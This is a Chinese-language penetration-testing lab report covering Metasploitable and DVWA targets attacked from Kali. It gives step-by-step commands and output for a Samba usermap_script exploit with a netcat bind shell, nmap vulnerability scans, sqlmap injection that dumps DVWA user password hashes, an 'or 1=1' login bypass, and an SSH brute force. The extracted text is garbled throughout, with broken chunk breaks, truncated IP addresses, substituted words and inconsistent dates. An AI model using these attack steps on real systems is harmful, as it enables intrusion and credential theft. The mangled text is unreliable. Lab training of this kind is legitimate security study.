【报告】渗透测试实验报告

1、渗透测试培训3 月 13 日第一天：主要试验总结第一利用 struts2 漏洞，可以直接执行任意命令，取得主机掌握权；试验环境：kali linux 作为攻击工具；owasp 作为靶机2003 metaspoitable实现能够胜利拜访使用 metaspliot完成对于靶机 samba 服务的攻击，猎取shell 权限search samba查找模块use multi/samba/usemap_script挑选渗透攻击模块show payloads查看与该渗透模块相兼容的攻击载荷set payload cmd/unix/bind_netcat挑选 netcat 工具在渗透攻击胜利后执行shel

2、l show options查看需要设置的参数set rhost 54 设置主机攻击主机exploit 启动攻击1、第一安装 vm 虚拟机程序，开启kali， owasp 和 metaspoitalbe 等工具和搭建环境，使得网络可达，网络配置上挑选 nat 模式，地址范畴为/242、开启 kali 虚机，进入 root 模式，第一进入 msfconsle，修改初始密码为123456 msf passwd* exec: passwd输入新的 unix 密码：重新输入新的unix 密码：passwd：已胜利更新密码然后查找 samba 模块msf sear

3、ch sambamatching modules=namedisclosure daterankdescriptionauxiliary/admin/smb/samba_symlink_traversalnormalsamba symlink directory traversalauxiliary/dos/samba/lsa_addprivs_heapnormalsambalsa_io_privilege_set heap overflowauxiliary/dos/samba/lsa_transnames_heapnormalsamba lsa_io_trans_names heap ov

4、erflowauxiliary/dos/samba/read_nttrans_ea_listnormalsamba read_nttrans_ea_list integer overflowexploit/freebsd/samba/trans2open2003-04-07greatsamba trans2open overflow *bsd x86exploit/linux/samba/chain_reply2021-06-16goodsamba chain_reply memory corruption linux x86exploit/linux/samba/lsa_transnames

5、_heap2007-05-14goodsamba lsa_io_trans_names heap overflowexploit/linux/samba/setinfopolicy_heap2021-04-10normalsambasetinformationpolicy auditeventsinfo heap overflowexploit/linux/samba/trans2open2003-04-07greatsamba trans2open overflow linux x86exploit/multi/samba/nttrans2003-04-07averagesamba 2.2.

6、2- 2.2.6 nttrans buffer overflowexploit/multi/samba/usermap_script2007-05-14excellentsamba usernamemap script command executionexploit/osx/samba/lsa_transnames_heap2007-05-14averagesamba lsa_io_trans_names heap overflowexploit/osx/samba/trans2open2003-04-07greatsamba trans2open overflow mac os x ppc

7、exploit/solaris/samba/lsa_transnames_heap2007-05-14averagesambalsa_io_trans_names heap overflowexploit/solaris/samba/trans2open2003-04-07greatsambatrans2open overflow solaris sparcexploit/unix/misc/distcc_exec2002-02-01excellentdistcc daemoncommand executionexploit/unix/webapp/citrix_access_gateway_

8、exec2021-12-21excellentcitrixaccess gateway command executionexploit/windows/http/sambar6_search_results2003-06-21normalsambar6search results buffer overflowexploit/windows/license/calicclnt_getconfig2005-03-02averagecomputerassociates license client getconfig overflowpost/linux/gather/enum_configsn

9、ormallinuxgather configurationsmsf use multi/samba/usermap_script挑选渗透攻击模块msf exploitusermap_script show payloads查看与该渗透模块相兼容的攻击载荷compatible payloads=namedisclosure daterankdescriptioncmd/unix/bind_awknormalunix command shell, bind tcp via awkcmd/unix/bind_inetdnormalunix command shell, bind tcp inetd

10、cmd/unix/bind_luanormalunix command shell, bind tcp via luacmd/unix/bind_netcatnormalunix commandshell, bind tcp via netcatcmd/unix/bind_netcat_gapingnormalunix commandshell, bind tcp via netcat -ecmd/unix/bind_netcat_gaping_ipv6normalunixcommand shell, bind tcp via netcat -e ipv6cmd/unix/bind_perln

11、ormalunix command shell, bind tcp via perlcmd/unix/bind_perl_ipv6normalunix command shell, bind tcp via perlipv6cmd/unix/bind_rubynormalunix command shell, bind tcp via rubycmd/unix/bind_ruby_ipv6normalunixcommand shell, bind tcp via ruby ipv6cmd/unix/bind_zshnormalunix command shell, bind tcp via z

12、shcmd/unix/genericnormalunix command,generic command executioncmd/unix/reversenormalunix command shell, double reverse tcp telnetcmd/unix/reverse_awknormalunix command shell, reverse tcp viaawkcmd/unix/reverse_luanormalunix command shell, reverse tcp via luacmd/unix/reverse_netcatnormalunix command

13、shell, reverse tcp via netcatcmd/unix/reverse_netcat_gapingnormalunix command shell, reverse tcp via netcat -ecmd/unix/reverse_opensslnormalunix command shell, doublereverse tcp ssl opensslcmd/unix/reverse_perlnormalunix command shell, reverse tcp via perlcmd/unix/reverse_perl_sslnormalunix commands

14、hell, reverse tcp sslvia perlcmd/unix/reverse_php_sslnormalunix command shell, reverse tcp ssl via phpcmd/unix/reverse_pythonnormalunix command shell, reverse tcp via pythoncmd/unix/reverse_python_sslnormalunix command shell, reverse tcp sslvia pythoncmd/unix/reverse_rubynormalunix command shell, re

15、verse tcp via rubycmd/unix/reverse_ruby_sslnormalunix command shell, reverse tcp sslvia rubycmd/unix/reverse_ssl_double_telnetnormalunix command shell, double reverse tcp ssl telnetcmd/unix/reverse_zshnormalunix commandshell, reverse tcp via zshmsf exploitusermap_script set payload cmd/unix/bind_net

16、cat挑选 netcat 工具在渗透攻击胜利后执行shell payload = cmd/unix/bind_netcatmsf exploitusermap_script show options查看需要设置的参数msf exploitusermap_script set rhost 54 设置主机攻击主机rhost = 54msf exploitusermap_script exploit启动攻击* started bind handler* command shell session 1 opened 28:56558 - 10

17、.10.10.254:4444 at 2021-03-13 16:06:40 +0800已经取得 54 机子的掌握权，可以增加用户useradd test用户增加胜利& 存活探测 -pu -sn udp ping 不列服务， -pn 不适用 pingnmap -ss -pn xx.xx.xx.xx tcp syn扫描 不发送 icmp namp -sv -pn xx.xx.xx.xx列出服务具体信息namp -po -script=smb-check-vulns xx.xx.xx.xx查找 ms-08067 漏洞&nmap 网站扫描msf nmapmsf nmap -sv

18、-pn 54 * exec: nmap -sv -pn 54starting nmap 6.46 at 2021-03-13 16:38 cst nmap scan report for 54host is up 0.00020s latency.all 1000 scanned ports on 54 are filtered mac address: 00:50:56:e7:1b:31 vmwareservice detection performed. please report any incorrect

19、results at.nmap done: 1 ip address 1 host up scanned in 22.84 secondsmsf nmap -po -script=smb-check-vulns 54 * exec: nmap -po -script=smb-check-vulns 54starting nmap 6.46 at 2021-03-13 16:47 cst nmap scan report for 54host is up 0.00021s latency.all 1000 scanned ports o

20、n 54 are filtered mac address: 00:50:56:e7:1b:31 vmwaremap done: 1 ip address 1 host up scanned in 23.06 seconds%msf nmap -o * exec: nmap -ostarting nmap 6.46 at 2021-03-13 17:16 cst nmap scan report for32host is up 0.0054s latency.not shown: 999 filtered ports portstate servic

21、e80/tcp openhttpwarning: osscan results may be unreliable because we could not find at least 1 open and 1 closed portaggressive os guesses: brother mfc-7820n printer 94%, digi connect me serial-to-ethernet bridge 94%, netgear sc101 storage central nas device 91%, shoretel shoregear-t1 voip switch 91

22、%, aastra 480i ip phone or sun remote system control rsc 91%, aastra 6731i voip phone or apple airport express wap 91%, cisco wireless ip phone 7920-etsi 91%, gopro hero3 camera 91%, konica minoltabizhub250 printer91%, linux 2.4.26slackware 10.0.0 86%no exact os matches for host test conditions non-

23、ideal.os detection performed. please report any incorrect results at. nmap done: 1 ip address 1 host up scanned in 57.88 secondsmsf use auxiliary/scanner/http/dir_scanner msf auxiliarydir_scanner set threads 50 threads = 50msf auxiliarydir_scanner set rhostsrhosts =msf auxiliarydir_scanner run* dete

24、cting error code * detecting error code* scanned 2 of 2 hosts 100% complete * auxiliary module execution completedsqlmap 检查 sql 注入的漏洞rootkali:# sqlmaprootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23带 cookie 的方式查出这个网站数据库的用户和密码sqlmap/1.0-dev - automatic sql injection and

25、 database takeover tool. legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end users responsibilityto obey all applicable local, state and federallaws. developers assume no liabilityand are not responsible for any misuse or damage caused by th

26、is program* starting at 11:50:2011:50:20 info testing connection to the target url11:50:20 info testing if the target url is stable. this can take a couple of seconds 11:50:21 info target url is stable11:50:21 info testing if get parameter id is dynamic11:50:21 info confirming that get parameter id

27、is dynamic 11:50:21 info get parameter id is dynamic11:50:21 info heuristics detected web page charset ascii11:50:21 info heuristic basic test shows that get parameter id might be injectable possible dbms: mysql 11:50:21 info testing for sql injection on get parameter idheuristic parsing test showed

28、 that the back-end dbms could be mysql. do you want to skip test payloads specific for other dbmses. y/n ydo you want to include all tests for mysql extending provided level 1 and risk 1. y/n y11:50:25 info testing and boolean-based blind - where or having clause 11:50:25 warning reflective values f

29、ound and filtering out11:50:25 info get parameter id seems to be and boolean-based blind - where or having clause injectable 11:50:25 info testing mysql = 5.0 and error-based - where or having clause11:50:25 info get parameter id is mysql = 5.0 and error-based - where or having clause injectable 11:

30、50:25 info testing mysql inline queries11:50:25 info testing mysql 5.0.11 stacked queries11:50:25 warning time-based comparison requires larger statistical model, please wait.11:50:25 info testing mysql 5.0.11 and time-based blind11:50:36 info get parameter id seems to be mysql 5.0.11 and time-based

31、 blind injectable11:50:36 info testing mysql union query null - 1 to 20 columns11:50:36 info automatically extending ranges for union query injection technique tests as there is at least one other potential technique found11:50:36 info order by technique seems to be usable. this should reduce the ti

32、me needed to find the right number of query columns. automatically extending the range for current union query injection technique test 11:50:36 info target url appears to have 2 columns in query11:50:36 info get parameter id is mysql union query null - 1 to 20 columns injectable get parameter id is

33、 vulnerable. do you want to keep testing the others if any. y/n nsqlmap identified the following injection points with a total of 41 https requests:-place: get parameter: idtype: boolean-based blindtitle: and boolean-based blind - where or having clause payload: id=1 and 4334=4334 and iasx=iasx&subm

34、it=submittype: error-basedtitle: mysql = 5.0 and error-based - where or having clausepayload: id=1 and select4941 fromselectcount*,concat0x71626e6f71,selectcase when 4941=4941then1else 0end,0x7163716271,floorrand0*2xfrom information_schema.character_sets group by xa and zahu=zahu&submit=submittype:

35、union querytitle: mysql union query null - 2 columnspayload:id=1unionallselect null,concat0x71626e6f71,0x4b4977451,0x7163716271#&submit=submit-type: and/or time-based blindtitle: mysql 5.0.11 and time-based blindpayload: id=1 and sleep5 and xfnp=xfnp&submit=submit11:50:40 info the back-end dbms is m

36、ysqlweb server operating system: linux ubuntu 10.04 lucid lynx web application technology: php 5.3.2, apache 2.2.14back-end dbms: mysql 5.011:50:40 info fetched data logged to text files under /usr/share/sqlmap/output/29 * shutting down at 11:50:40rootkali:# sqlmap -u -cookie=security=low;

37、 phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -dbs可以看出返回数据库为：11:53:32 warning reflective values found and filtering out available databases 2:* dvwa* information_schemarootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -d dvwa -tables查看 dvwa 数据库database: dvwa 2 tables+

38、-+| guestbook | users|+-+rootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -d dvwa -t users-columnsdatabase: dvwa table: users6 columns+-+-+| column| type|+-+-+| user| varchar15 | avatar| varchar70 | first_name | varchar15 | last_name| varchar15 | password| varchar

39、32 | user_id| int6|+-+-+rootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -d dvwa -t users-c user,password -dump database: dvwatable: users5 entries+-+-+| user| password|+-+-+| 1337| 8d3533d75ae2c3966d7e0d4fcc69216b charley | admin| 21232f297a57a5a743894a0e4a801fc3

40、 admin| gordonb | e99a18c428cb38d5f260853678922e03 abc123| pablo| 0d107d09f5bbe40cade3de5c71e9e9b7| smithy| 5f4dcc3b5aa765d61d8327deb882cf99|+-+-+可以看出用户名为admin密码是 admin胜利2day&情报收集whois 域名注册信息查询；目标：netcraft 网站供应的信息查询，查询网站宿主，站点排名，操作系统 t查询网站 旁注技术，主站没问题，可以看一下同服务器上其他的网站ip2domain 反查询网站1、google hacking 2、目

41、录结构parent directory site ： /xxxxinc:网站培植信息，数据库口令等；bak:备份文件； txt or sql 数据结构等use auxiliary/scanner/http/dir_scanner set threads 50 设置进程set rhosts xxxx设置目标设置完成后进行 runexploitrobots.txt 告知搜寻引擎那些目录是敏锐文件&3、检索特定类型文件site:xxxx.4、搜寻易存在sql注入点的页面site:xxx inurl:login登陆界面里面在随机用户后面加个引号，引发数据库错误，然后可以发觉数据库查询的格式select

42、 from usersusername=xx and password=xxadmin or1 admin or1select fromusers username=adminadminor 1=1-密码就任凭输入数字即可网站上页面上加一个引号 假如存在注入就会显现数据库报错，否就就是页面没有变化仍有一种方式就是再后面加and 1=1 或者 1=2，都会报错，仍有a=aadminor 1=1-进去 sqlmap sqlmap -u sqlmap -u http:/rootkali:# sqlmap sqlmap -u url -cookie=-p id -d-t主机探测与端口扫描活跃主机扫描u

43、se ausiliary/scanner/discovery/arp_sweep set rhosts 2-130set threads 50run2、nmap服务扫描与查点1、metasploit 的 scanner 帮助模块中，有许多用于服务扫描和查点的工具，这些工具常以service namelogin命名search name:version 2、ssh查点use auxiliary/scanner/ssh/ssh_versionset rhosts xxxx set threads 100run & ssh 查点试验：rootkali:# msfconsolems

44、f use auxiliary/scanner/ssh/ssh_version msf auxiliaryssh_version show optionsmodule options auxiliary/scanner/ssh/ssh_version:namecurrent settingrequireddescriptionrhosts rport22yes yesthe target address range or cidr identifier the target portthreads1yesthe number of concurrent threadstimeout30yest

45、imeout for the ssh probemsf auxiliaryssh_version set rhosts 29 rhosts = 29msf auxiliaryssh_version set threads 100 threads = 100msf auxiliaryssh_version run* 29:22, ssh server version: ssh-2.0-openssh_5.3p1 debian-3ubuntu4 * scanned 1 of 1 hosts 100% complete* auxiliary

46、 module execution completed&口令猜解地址可以是地址段或单ip 或地质区段 user msfconsole 里面use auxiliary/scanner/ssh/ssh_login set rhosts 0set username root set pass_set threas 100runvi一个密码文件口令嗅探set auxiliary/sniffer/psnuffle & 口令猜解试验：msf use auxiliary/scanner/ssh/ssh_login msf auxiliaryssh_login show option

47、smodule options auxiliary/scanner/ssh/ssh_login:namecurrent settingrequireddescriptionblank_passwordsfalsenotry blank passwords for all usersbruteforce_speed5yeshow fast to bruteforce, from 0 to 5db_all_credsfalsenotry each user/passwordcouple storedin thecurrentdatabasedb_all_passdb_all_usersfalsef

48、alsenonoadd all passwords in the current database to the listadd all users in the current database to the listpassword pass_filenonoa specific password to authenticate with passwords, one per linerhostsyesthe target address range or cidr identifierrport22yesthe target portlinestop_on_success falseye

49、sstop guessing when a credential works for a host threads1yesthe number of concurrent threadsusernamenoa specific username to authenticate as userpass_filenousers and passwords separated by space, one pair peruser_as_passfalsenotry the username as the password for all users user_filenousernames, one

50、 per lineverbosetrueyeswhether to print output for all attemptsmsf auxiliaryssh_login set username root username = rootmsf auxiliaryssh_login setpass_file / root/ passwd:/ 在 root 根目录下创建一个密码文件,名字叫 passwdpass_file = root passwdmsf auxiliaryssh_login set threads 50 threads = 50msf auxiliaryssh_login set rhosts 29 rhosts = 29msf auxiliaryssh_login run* 29:22 ssh - starting bruteforce* 29:22 ssh - 1/3 - trying: username: root with password: ahbieid - 10.10.1